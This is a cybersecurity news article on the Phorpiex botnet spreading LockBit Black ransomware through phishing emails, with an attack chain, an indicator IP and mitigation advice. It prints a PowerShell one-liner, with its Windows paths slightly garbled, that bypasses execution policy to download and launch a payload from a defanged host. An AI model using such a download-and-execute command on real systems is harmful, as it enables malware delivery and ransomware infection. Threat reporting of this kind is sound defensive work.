Phorpiex Botnet Distributes LockBit Ransomware Through Compromised Websites

Uncategorized January 30, 2025

Cybersecurity experts have uncovered the use of the Phorpiex botnet to distribute LockBit Black ransomware (LockBit 3.0) through millions of phishing emails and compromised websites.

This campaign, active since April 2024, marks a significant evolution in ransomware delivery methods, leveraging automation to propagate malware at an unmatched scale.

Phorpiex, also known as Trik, is a decade-old botnet notorious for its involvement in spam campaigns, cryptocurrency theft, and malware delivery.

After its source code was sold on the dark web in 2021, the botnet re-emerged with enhanced capabilities under the name “Twizt.” Operating in a peer-to-peer mode without centralized command-and-control (C2) servers, Phorpiex has proven resilient and adaptable.

TWIZT Infection Flow (Source – Cybereason)

LockBit Black, a variant of LockBit ransomware, is known for its speed and efficiency. It employs advanced encryption techniques, such as AES for file encryption and RSA for securing encryption keys.

The ransomware also incorporates double extortion tactics, exfiltrating sensitive data before encrypting systems to pressure victims into paying ransoms.

Besides this, researchers at Cybereason noted that the attack begins with phishing emails containing ZIP attachments.

Attack Chain

The phishing emails often use aliases like “Jenny Brown” or “Jenny Green” and subject lines such as “Your document” or “Photo of you???”.

Upon opening the ZIP file, victims execute a malicious binary (like .doc.scr or .exe), which connects to the Phorpiex infrastructure to download the LockBit payload.

Phorpiex to LockBit Execution FlowChart (Source – Cybereason)

Here below we hav mentioned the technical steps:-

  1. Downloader Execution: The malicious executable downloads LockBit from C2 servers (e.g., 193.233.132[.]177).
  2. File Encryption: LockBit encrypts files locally and on network drives using AES encryption.
  3. Persistence Mechanisms: The downloader modifies registry keys and creates mutexes to ensure persistence.
  4. Anti-Detection Techniques: Phorpiex deletes Zone.Identifier files to erase download traces and employs obfuscation to evade analysis.

Code Snippet (Downloader Execution):-

%windir%System32cmd.exe /c powershell.exe -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://phorpiex[.]net/payload.exe','%userprofile%tempfile.exe');Start-Process '%userprofile%tempfile.exe'

This campaign has targeted organizations across multiple sectors, including healthcare, finance, manufacturing, and critical infrastructure.

The attackers exploit over 1,500 unique IP addresses globally, with significant activity traced to regions like Kazakhstan, Russia, and China.

To defend against such threats, organizations should implement advanced email filtering solutions to block phishing attempts and deploy anti-ransomware tools with behavioral analysis capabilities for endpoint protection.

Regular cybersecurity awareness programs help educate users, while maintaining offline backups of critical data ensures recovery in case of an attack.

By combining automation with advanced payloads like LockBit 3.0, attackers are amplifying their reach and impact. Organizations must adopt proactive security measures to mitigate risks posed by such large-scale campaigns.

Collect Threat Intelligence with TI Lookup to Improve Your Company’s Security - Get 50 Free Request

The post Phorpiex Botnet Distributes LockBit Ransomware Through Compromised Websites appeared first on Cyber Security News.